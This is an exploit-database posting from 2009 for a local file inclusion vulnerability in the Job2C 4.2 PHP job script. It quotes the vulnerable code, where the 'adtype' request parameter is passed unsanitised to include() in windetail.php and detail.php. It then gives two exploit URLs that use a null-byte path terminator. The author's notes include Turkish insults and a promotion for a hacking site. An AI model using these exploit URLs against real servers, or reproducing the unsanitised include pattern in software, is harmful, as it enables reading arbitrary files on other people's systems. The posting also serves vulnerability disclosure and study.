Job2C 4.2 (adtype) Local File Inclusion Vulnerability

2009-04-15T00:00:00
ID 1337DAY-ID-5043
Type zdt
Reporter ZoRLu
Modified 2009-04-15T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================
Job2C 4.2 (adtype) Local File Inclusion Vulnerability
=====================================================


[~] Job2C version 4.2 (adtype) MulTiple LFi
[~]
[~] Script: http://www.w2b.ru/download/Job2C.zip
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 15.04.2009
[~]
[~] N0T: Herkes Hecker Olmus :S yav siktirin gidin mal mal gelip msn de konusmayIn :S Herkes Ustune AlInmasIn anlayan anladI :S
[~]
[~] N0T: if you wanna learn hack you must be register to my site yildirimordulari.com
[~] -----------------------------------------------------------

file: 

windetail.php

err0r c0de:

$adtype=$_REQUEST["adtype"];
$id=$_REQUEST["id"];                 ( err0r c0de 1 )
$title=$_REQUEST["title"];

	winHead($title);
	include("lib/".$adtype.".inc");    ( err0r c0de 2 )
	
exp 1:
	
yildirimordulari.com/script/windetail.php?adtype=LFY%00

file:

detail.php

err0r c0de:

$mode=$_REQUEST["mode"];
$adtype=$_REQUEST["adtype"];         ( err0r c0de 1 )
$id=$_REQUEST["id"];
$auth=$_SESSION["auth"];
include("conf/conf.inc");
include("lib/lib.inc");
include("lib/addlib.inc");
include("templates/header.inc");
if(!$adtype)$adtype="res";

	include("lib/".$adtype.".inc");    ( err0r c0de 1 )	
	

exp 2:

yildirimordulari.com/script/detail.php?adtype=LFY%00


[~] ----------------------------------------------------------------------



#  0day.today [2018-01-05]  #